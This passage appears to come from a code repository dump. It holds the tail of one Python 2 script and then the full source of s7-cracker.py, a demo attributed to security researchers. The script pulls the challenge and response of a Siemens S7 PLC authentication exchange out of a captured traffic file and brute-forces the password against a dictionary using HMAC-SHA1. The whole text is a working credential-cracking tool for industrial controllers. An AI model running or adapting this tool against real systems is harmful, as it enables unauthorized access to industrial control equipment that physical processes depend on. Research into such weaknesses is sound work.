and raw_response[110:112] == '00': 81 | response = raw_response[70:110] 82 | print "found response: %s" % response 83 | else: 84 | print "cannot find response. exit" 85 | sys.exit() 86 | 87 | return challenge, response 88 | 89 | def calculate_s7response(password, challenge): 90 | challenge = challenge.decode("hex") 91 | return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest() 92 | 93 | if __name__ == '__main__': 94 | print "using pcap file: %s" % cfg_pcap_file 95 | challenge, response = get_challenge_response() 96 | print "start password bruteforsing ..." 97 | for p in open(cfg_dictionary_file): 98 | p = p.strip() 99 | if response == calculate_s7response(p, challenge): 100 | print "found password: %s" % p 101 | sys.exit() 102 | print "password not found. try another dictionary." -------------------------------------------------------------------------------- /source/s7-cracker.py: -------------------------------------------------------------------------------- 1 | """ 2 | As posted on: http://pastebin.com/0G9Q2k6y 3 | 4 | File: s7-cracker.py 5 | Desc: offline password bruteforsing based on challenge-response data, extracted from auth traffic dump file 6 | 7 | Installing (scapy) pcapy on Windows for Python 2.7: 8 | 9 | See: http://stackoverflow.com/a/23279252 10 | 11 | Download and install http://dirk-loss.de/scapy/dnet-1.12.win32-py2.7.exe and http://code.google.com/p/pypcap/issues/detail?id=36 12 | 13 | 14 | 15 | Original authors: 16 | 17 | Alexander Timorin, Dmitry Sklyarov 18 | http://scadastrangelove.org 19 | 20 | As posted on: http://pastebin.com/0G9Q2k6y 21 | 22 | Version: 0.1 (just for demo, don't kick my ass plz) 23 | """ 24 | 25 | import argparse 26 | import sys 27 | import hashlib 28 | import hmac 29 | from binascii import hexlify 30 | 31 | try: 32 | from scapy.all import * 33 | except ImportError: 34 | print "please install scapy: http://www.secdev.org/projects/scapy/ " 35 | sys.exit() 36 | 37 | 38 | def get_challenge_response(cfg_pcap_file): 39 | r = rdpcap(cfg_pcap_file) 40 | 41 | lens = map(lambda x: x.len, r) 42 | pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))]) 43 | 44 | # try to find challenge packet 45 | pckt_108 = 0 #challenge packet (from server) 46 | for (pckt_indx, pckt_len) in pckt_lens.items(): 47 | if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732': 48 | pckt_108 = pckt_indx 49 | break 50 | 51 | # try to find response packet 52 | pckt_141 = 0 #response packet (from client) 53 | _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ]) 54 | for pckt_indx in sorted(_t1.keys()): 55 | pckt_len = _t1[pckt_indx] 56 | if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831': 57 | pckt_141 = pckt_indx 58 | break 59 | 60 | # try to find auth result packet 61 | pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok 62 | pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad 63 | for pckt_indx in sorted(_t1.keys()): 64 | pckt_len = _t1[pckt_indx] 65 | if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32': 66 | pckt_84 = pckt_indx 67 | break 68 | if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732': 69 | pckt_92 = pckt_indx 70 | break 71 | 72 | print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92) 73 | if pckt_84: 74 | print "auth ok" 75 | else: 76 | print "auth bad. for brute we need right auth result. exit" 77 | sys.exit() 78 | 79 | challenge = None 80 | response = None 81 | 82 | raw_challenge = hexlify(r[pckt_108].load) 83 | if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00': 84 | challenge = raw_challenge[52:92] 85 | print "found challenge: %s" % challenge 86 | else: 87 | print "cannot find challenge. exit" 88 | sys.exit() 89 | 90 | raw_response = hexlify(r[pckt_141].load) 91 | if raw_response[64:70] == '100214' and raw_response[110:112] == '00': 92 | response = raw_response[70:110] 93 | print "found response: %s" % response 94 | else: 95 | print "cannot find response. exit" 96 | sys.exit() 97 | 98 | return challenge, response 99 | 100 | def calculate_s7response(password, challenge): 101 | challenge = challenge.decode("hex") 102 | return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest() 103 | 104 | if __name__ == '__main__': 105 | 106 | parser = argparse.ArgumentParser(description='Crack S7 password using a dictionary') 107 | parser.add_argument('file', metavar='FILE', type=str, help='A PCAP file containing S7 traffic') 108 | parser.add_argument('dict', metavar='DICT', type=str, help='Dictionary to use when cracking') 109 | args = parser.parse_args() 110 | 111 | print "using pcap file: %s" % args.file 112 | challenge, response = get_challenge_response(args.file) 113 | print "start password bruteforsing ..." 114 | for p in open(args.dict): 115 | p = p.strip() 116 | if response == calculate_s7response(p, challenge): 117 | print "found password: %s" % p 118 | sys.exit() 119 | print "password not found. try another dictionary." --------------------------------------------------------------------------------